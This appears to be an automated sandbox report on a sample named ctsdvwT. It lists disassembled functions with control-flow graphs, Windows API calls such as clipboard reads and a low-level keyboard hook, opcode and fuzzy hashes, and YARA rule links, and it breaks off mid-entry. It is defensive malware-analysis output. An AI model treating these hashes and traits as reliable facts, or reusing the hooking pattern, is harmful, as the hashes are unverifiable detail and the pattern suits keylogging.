                                        Function 02A83E90 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f24b086a9df0664c2c8c95cd692531272b084fdc687c90165508eba9f092a4e
                                        • Instruction ID: 42c89bafb46bc8fe8c73faa5d97ac8c37a2ecae762b699c054d1b56cfa1216dc
                                        • Opcode Fuzzy Hash: 3f24b086a9df0664c2c8c95cd692531272b084fdc687c90165508eba9f092a4e
                                        • Instruction Fuzzy Hash: A0915170E0020ADFDF14EFA9C9857EEBBF2BF88714F148129E415AB254EB749845CB81
                                        Function 0613C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1357 613c2ac-613d5c4 1361 613d674-613d694 call 6136c44 1357->1361 1362 613d5ca-613d5cf 1357->1362 1369 613d697-613d6a4 1361->1369 1364 613d622-613d65a CallWindowProcW 1362->1364 1365 613d5d1-613d608 1362->1365 1367 613d663-613d672 1364->1367 1368 613d65c-613d662 1364->1368 1372 613d611-613d620 1365->1372 1373 613d60a-613d610 1365->1373 1367->1369 1368->1367 1372->1369 1373->1372
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0613D649
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 84ea7f07df1a3b502be1fc0790876dc6b648aa175ce846f9b226cae46e361ff9
                                        • Instruction ID: 707f4aabfab49261e5352184005e6cb40ada921d3f4ed2a1016cda4ec75f7596
                                        • Opcode Fuzzy Hash: 84ea7f07df1a3b502be1fc0790876dc6b648aa175ce846f9b226cae46e361ff9
                                        • Instruction Fuzzy Hash: 354125B5D00359CFDB54CF99D888AAABBF5FF88314F248459E519AB321D334A841CFA0
                                        Function 0613E2CC Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1375 613e2cc-613e328 1376 613e332-613e370 OleGetClipboard 1375->1376 1377 613e372-613e378 1376->1377 1378 613e379-613e3c7 1376->1378 1377->1378 1383 613e3d7 1378->1383 1384 613e3c9-613e3cd 1378->1384 1386 613e3d8 1383->1386 1384->1383 1385 613e3cf 1384->1385 1385->1383 1386->1386
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 83fa3e8177c3eb157aa2174bbbb5027ba8cf5b54286b914920ded34605e4144f
                                        • Instruction ID: 6209dbd2cc43577dd9b31d1c54bfdaafb4c2b8f555b781dccf28e9989d328ff5
                                        • Opcode Fuzzy Hash: 83fa3e8177c3eb157aa2174bbbb5027ba8cf5b54286b914920ded34605e4144f
                                        • Instruction Fuzzy Hash: 1C3102B0D01258DFDB54CFA9C984BCEBBF5AF48304F24802AE105BB2A0D7B5A945CF65
                                        Function 0613DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1387 613dcc8-613e370 OleGetClipboard 1390 613e372-613e378 1387->1390 1391 613e379-613e3c7 1387->1391 1390->1391 1396 613e3d7 1391->1396 1397 613e3c9-613e3cd 1391->1397 1399 613e3d8 1396->1399 1397->1396 1398 613e3cf 1397->1398 1398->1396 1399->1399
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: f91a4dfcbee5b5714c1bbba88c0b4be3a997dc91ae4334fb9648fc8ce9fd75b5
                                        • Instruction ID: 23d7e769ff5d4c71c5d7a0fe14332b24e6c75238b32a65b9e73e4feb71720c90
                                        • Opcode Fuzzy Hash: f91a4dfcbee5b5714c1bbba88c0b4be3a997dc91ae4334fb9648fc8ce9fd75b5
                                        • Instruction Fuzzy Hash: 693101B0D01318DFDB54DF99C984B9EBBF5AF48304F20802AE505BB3A0D7B5A944CB95
                                        Function 0613C2E8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1400 613c2e8-613c307 1402 613c309-613c30b 1400->1402 1403 613c30e-613c3a4 1400->1403 1404 613d8c8-613d901 1402->1404 1403->1404 1407 613d909-613d934 KiUserCallbackDispatcher 1404->1407 1408 613d936-613d93c 1407->1408 1409 613d93d-613d951 1407->1409 1408->1409
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0613D89D), ref: 0613D927
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 898fa2a9bbff52dc06f0b3277e2b19c79535efd637074f64b7cce4fb33fb48e9
                                        • Instruction ID: cd8230d290b5e36e8c5b6105818f72ad947d9eceb493a40fd5f20a844262d4b4
                                        • Opcode Fuzzy Hash: 898fa2a9bbff52dc06f0b3277e2b19c79535efd637074f64b7cce4fb33fb48e9
                                        • Instruction Fuzzy Hash: A42186B1C04368CFDB10DFA9D894BDABFF4EF49310F10849AC459A7211D338A844CBA0
                                        Function 0613FE21 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1411 613fe21-613fe24 1412 613fe26-613fe72 1411->1412 1413 613fe7a-613fe7d 1411->1413 1415 613fe7e-613feb0 SetWindowsHookExA 1412->1415 1418 613fe74-613fe7c 1412->1418 1413->1415 1416 613feb2-613feb8 1415->1416 1417 613feb9-613fed9 1415->1417 1416->1417 1418->1415
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,00000000), ref: 0613FEA3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 12899c675876d72b66bb72f86e42e75b687613a539faf0d161eafd9fdac1d923
                                        • Instruction ID: b1b78e1002d79d7c0801328957e3247608c1da83f99136047377f3f196532e65
                                        • Opcode Fuzzy Hash: 12899c675876d72b66bb72f86e42e75b687613a539faf0d161eafd9fdac1d923
                                        • Instruction Fuzzy Hash: E42166B5D003498FCB54CFAAC844BDEBBF1BF89310F14842AE459A7261C7386945CFA0
                                        Function 0613C6F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1422 613c6f0-613c78c DuplicateHandle 1423 613c795-613c7b2 1422->1423 1424 613c78e-613c794 1422->1424 1424->1423
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0613C77F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 04c0c894e09e8580043245834cd09116a8c9b1d9f973fb2437453428ddc994ca
                                        • Instruction ID: 404e40e438fd311fd7201106bac5701e70a6613fae048268c5fb4345442a2ce4
                                        • Opcode Fuzzy Hash: 04c0c894e09e8580043245834cd09116a8c9b1d9f973fb2437453428ddc994ca
                                        • Instruction Fuzzy Hash: 1E21E0B5D002599FDB10CFAAD984AEEBFF5FB48310F14801AE958B3250D379A951CFA0
                                        Function 0613C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1427 613c6f8-613c78c DuplicateHandle 1428 613c795-613c7b2 1427->1428 1429 613c78e-613c794 1427->1429 1429->1428
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0613C77F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 6fd305b14305f08373e51c2be8896d96f3f4d36a4feb32ffe93995801410b27f
                                        • Instruction ID: 6d16fd9d8485ba1e95f513583736096f7f9770a380f0d648464c0a336aa5ce43
                                        • Opcode Fuzzy Hash: 6fd305b14305f08373e51c2be8896d96f3f4d36a4feb32ffe93995801410b27f
                                        • Instruction Fuzzy Hash: C621E0B59002189FDB10CFAAD984ADEBBF8FB48310F14801AE918B3210D379A940CFA0
                                        Function 06135E54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06137956
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 9d401a10c8e2a6de48c2e6dfa9f46089f54df8ad05fd4a824cd81f4348b7ddb6
                                        • Instruction ID: 099caae8cdc9b4f5a0b19bf3ae81c1a1c5ae55357036a5a63ec74bfcf5dc4e4d
                                        • Opcode Fuzzy Hash: 9d401a10c8e2a6de48c2e6dfa9f46089f54df8ad05fd4a824cd81f4348b7ddb6
                                        • Instruction Fuzzy Hash: 3D1120B1C002598FDB10DF9AD444B9EFBF4EB88320F10856AD529B7240C379A545CFA4
                                        Function 0613C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0613D89D), ref: 0613D927
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: e20d0d77aa3ea1375bbdf47f439b314cac7b41424a89c5dbd7a29aa981342e0a
                                        • Instruction ID: a543dc1a33ba4208c4fe0c31a56787d9e0d085d043217d576bf9359a31c4fb45
                                        • Opcode Fuzzy Hash: e20d0d77aa3ea1375bbdf47f439b314cac7b41424a89c5dbd7a29aa981342e0a
                                        • Instruction Fuzzy Hash: 8D11F2B5800258CFCB10DF9AE548B9EBBF8EF49310F20845AD519B7250C779A944CFA5
                                        Function 0613E189 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0613E1E5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 6c23abf8dd2d48db9421e0930de1af5d27402012fd0939c23fe4fd1a6455ce17
                                        • Instruction ID: fabd2da0ed35ecad80be293d558d00d8151270ede98496a3ee6447bb83a449dc
                                        • Opcode Fuzzy Hash: 6c23abf8dd2d48db9421e0930de1af5d27402012fd0939c23fe4fd1a6455ce17
                                        • Instruction Fuzzy Hash: 6E1112B5800759CFDB20DF9AD948BDEBBF8AB48320F24845AE559B3210C379A544CFA0
                                        Function 02A8EEC5 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: 9f84b288287a8662d5a371bfcd55f72aa012e7cad21d10a0b9c7071dbae11465
                                        • Instruction ID: a4dd14c3fd597746c0fa176bec1e95f1d884aa21a8daecba177d46dbade14242
                                        • Opcode Fuzzy Hash: 9f84b288287a8662d5a371bfcd55f72aa012e7cad21d10a0b9c7071dbae11465
                                        • Instruction Fuzzy Hash: 99311030B00201DFDB05AB34D6A476E3BB2AF89250F244569E006EB385EF34CC46CBA1
                                        Function 02A8EED8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q
                                        • API String ID: 0-3168235125
                                        • Opcode ID: e892e2fef8e7c90db05d1172dd9cc3988a52920efb7e30fe7ea3df52069d84a8
                                        • Instruction ID: 864e33e0b1c564bd5eaebbddc49cfe8b82b52d2f066ac57614254d67c29e42c0
                                        • Opcode Fuzzy Hash: e892e2fef8e7c90db05d1172dd9cc3988a52920efb7e30fe7ea3df52069d84a8
                                        • Instruction Fuzzy Hash: 0A31E030B00206CFDB19AB74D6A476E3BE6AF89254F244539E406DB384EF75DC46CB91
                                        Function 02A871F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 04de9c8335318abdca9ac34ef58887a3409b0108a1c5096cb305b42c4486861a
                                        • Instruction ID: 38188df4fcd94d5c8abf3ebfd502ed4618192a6c5fa0e8283f41f384c57fc1df
                                        • Opcode Fuzzy Hash: 04de9c8335318abdca9ac34ef58887a3409b0108a1c5096cb305b42c4486861a
                                        • Instruction Fuzzy Hash: 53314E35E1020A9BDB14DFA4D89079EF7B2FF85314F208525F916EB250EF74A942CB92
                                        Function 02A871E8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR]q
                                        • API String ID: 0-3081347316
                                        • Opcode ID: 032578c0633d168bc4d72f890b7d544f5989c8564c77a125cbad3e610b855693
                                        • Instruction ID: 9dcb36d653253e88d084efd719e495c23888d0b9beaacd61d55ba67cd8dc8d47
                                        • Opcode Fuzzy Hash: 032578c0633d168bc4d72f890b7d544f5989c8564c77a125cbad3e610b855693
                                        • Instruction Fuzzy Hash: F2314E34E1024A9BDB15DFA4D8947AEF7B2FF85314F208529F806EB250EF749942CB52
                                        Function 02A88E70 Relevance: .4, Instructions: 409COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe9177a65c932dba67357b01e278a35ee7dc297698aa7d8ca8948ec024e3a4dd
                                        • Instruction ID: 10391ead8fdbb2a47616df97710cbc5d4dc83f94b69be088949dc780ccf692c1
                                        • Opcode Fuzzy Hash: fe9177a65c932dba67357b01e278a35ee7dc297698aa7d8ca8948ec024e3a4dd
                                        • Instruction Fuzzy Hash: C0E16E34B0020A9FDB14EB68D985BBEBBB6EB88314F548469E406D7354DF35DC46CB81
                                        Function 02A87780 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0632a1f1c256a57c12a749f6c06e49f2ef0a56581b5a1dcc04ec3b0aee7b14a
                                        • Instruction ID: 1e7f8692f13c01c1a009aba9ece546ab4729c160262ec47439f5bcc076cdfc10
                                        • Opcode Fuzzy Hash: f0632a1f1c256a57c12a749f6c06e49f2ef0a56581b5a1dcc04ec3b0aee7b14a
                                        • Instruction Fuzzy Hash: 5FB162307002028FCB15AB28EA95A6CB7A6FBC5268F645939E106CFB54DF75DC47CB80
                                        Function 02A84AA3 Relevance: .3, Instructions: 259COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8290875f0a7f2f77a31b57cb58f34f997e6bd7a41993c39fffc1a81691f455c
                                        • Instruction ID: 404593ec17325b7f370dd90fe5a43647fa835ffdabd0f66783c39e1ffd020668
                                        • Opcode Fuzzy Hash: d8290875f0a7f2f77a31b57cb58f34f997e6bd7a41993c39fffc1a81691f455c
                                        • Instruction Fuzzy Hash: F8A15CB0E0021ACFDF10EFA9C98579DBBF1BF8C318F148529D819A7254EB749885CB91
                                        Function 02A88E5C Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f04c2450533ac0a38938494fa94d217ee92a79247fc189e191a830a9df660474
                                        • Instruction ID: 75e3b368ae58d3319f9fe6527bc0d4426d2fbcee55b72e87a8936036d4ad5409
                                        • Opcode Fuzzy Hash: f04c2450533ac0a38938494fa94d217ee92a79247fc189e191a830a9df660474
                                        • Instruction Fuzzy Hash: C7915B34B002099FCB14EB64E985AADBBF6EF88314F548469E806E7365DF35EC46CB50
                                        Function 02A83E88 Relevance: .2, Instructions: 234COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9db9bc97a5703b931c8bd43e7aad6a58e505b5138c96308ecb52eeb5b4e8be13
                                        • Instruction ID: 83148dcc55a7625e3f154a04e0343fad70c0f185a0ab928eb35becf21b596b7b
                                        • Opcode Fuzzy Hash: 9db9bc97a5703b931c8bd43e7aad6a58e505b5138c96308ecb52eeb5b4e8be13
                                        • Instruction Fuzzy Hash: B7913E70E0020ADFDF10EFA9D9857EEBBF1BF88718F148129E415AB254EB749845CB91
                                        Function 02A89398 Relevance: .2, Instructions: 212COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42e63dfd99f079c244b1227f57d4ca04f66a604b7f90ac90abe2ab35ec6c09fb
                                        • Instruction ID: 2a0d24d902cc90f4ab76885ec48eb02b6b19c73d9bad3aa3f2681a2ca4413762
                                        • Opcode Fuzzy Hash: 42e63dfd99f079c244b1227f57d4ca04f66a604b7f90ac90abe2ab35ec6c09fb
                                        • Instruction Fuzzy Hash: D2716E75A002058FDB04DFA9E984BAEBBF5FF88310F14C169E909AB395DB71D845CB90
                                        Function 02A8C630 Relevance: .2, Instructions: 192COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c83b477df9d158d9ba31c2647fc85e3c08e7851d37ff983069929ffb44e4d5a2
                                        • Instruction ID: 0c56b0b61352ac6db99f2b82cc0b0604c6e5a6570d16151e1adabbab407b1241
                                        • Opcode Fuzzy Hash: c83b477df9d158d9ba31c2647fc85e3c08e7851d37ff983069929ffb44e4d5a2
                                        • Instruction Fuzzy Hash: 2F61B232E101298BDB18DB59C8807BEF7F3EB84320F19C56AC456AB641C734AD85CFA0
                                        Function 02A86CE7 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 588887c78b86af20b01e008d8eb64642d91ef280563a452612231c1607f42341
                                        • Instruction ID: e843572a19191b31175e842134e804c7bbb2c09886ba2fbf0a98386c419fe2a5
                                        • Opcode Fuzzy Hash: 588887c78b86af20b01e008d8eb64642d91ef280563a452612231c1607f42341
                                        • Instruction Fuzzy Hash: 825114B1D002188FEB14DFAAC885B9DBBB5BF48714F148129E819BB394DB74A844CF95
                                        Function 02A86CF0 Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ee161a5dc5aff1816893ea9ab39855a0177f9c5bc340d01723758ca501a46aa
                                        • Instruction ID: 1d4955dd2a255fb0dfab99ce9bb8961731ba911749aecc597cadfe505bc995d2
                                        • Opcode Fuzzy Hash: 0ee161a5dc5aff1816893ea9ab39855a0177f9c5bc340d01723758ca501a46aa
                                        • Instruction Fuzzy Hash: A85114B1D002188FEB14DFAAC885B9DBBF5BF48714F148129E819BB350DB74A844CF95
                                        Function 02A8112B Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ff0decb489ce316bd2c257bdaf9880a15f4afb9c24a9eab68d15462d3977251
                                        • Instruction ID: e7f9321dd710bb1fab1c96be9b4c59b1eaef617645a7dfe74c24d5bb419eddfe
                                        • Opcode Fuzzy Hash: 5ff0decb489ce316bd2c257bdaf9880a15f4afb9c24a9eab68d15462d3977251
                                        • Instruction Fuzzy Hash: 0451FA306031828FCB0AEF28FBA09443FA5EB5531D3049979D1055BE2EFB746A6ADB51
                                        Function 02A81138 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da3949ab24ad52884b54966a9319867d3d811d2f81c6c0cb161435fda49b9539
                                        • Instruction ID: 457274d23f7cc11508f740c8365873f78078d6b467a0f85452969e9293e16784
                                        • Opcode Fuzzy Hash: da3949ab24ad52884b54966a9319867d3d811d2f81c6c0cb161435fda49b9539
                                        • Instruction Fuzzy Hash: 8451DA306031828FCB0AEF28FBA09443FA5AB5531D3009979D1055BE3EFB746A6ADB51
                                        Function 02A8ED88 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5030429ad8addd0cfa2770d7f16965f87dd0c904bd0d7dd41d43ff7939d1621
                                        • Instruction ID: 494186c2e0ebfc02a0e0048393a4fdfa04db46b6653c57e21b085ca003bb7661
                                        • Opcode Fuzzy Hash: f5030429ad8addd0cfa2770d7f16965f87dd0c904bd0d7dd41d43ff7939d1621
                                        • Instruction Fuzzy Hash: A0315A35E00609DBCB15DFA4D994A9EBBB2FF89300F508929E856E7750EF70AC46CB50
                                        Function 02A850A8 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c68df7393a8f27125a48ae8c5253c98be3820c5d62c536a0228ee059b996aca0
                                        • Instruction ID: 7b61d68ebcab3f572a9a63c83e523db64a766b489059ce8b04af9c01f833eebd
                                        • Opcode Fuzzy Hash: c68df7393a8f27125a48ae8c5253c98be3820c5d62c536a0228ee059b996aca0
                                        • Instruction Fuzzy Hash: 67314F30A01255CFDB14FB74CA606AE77B2BF49319F510868D805ABB94EF36DD0ACB91
                                        Function 02A826F3 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
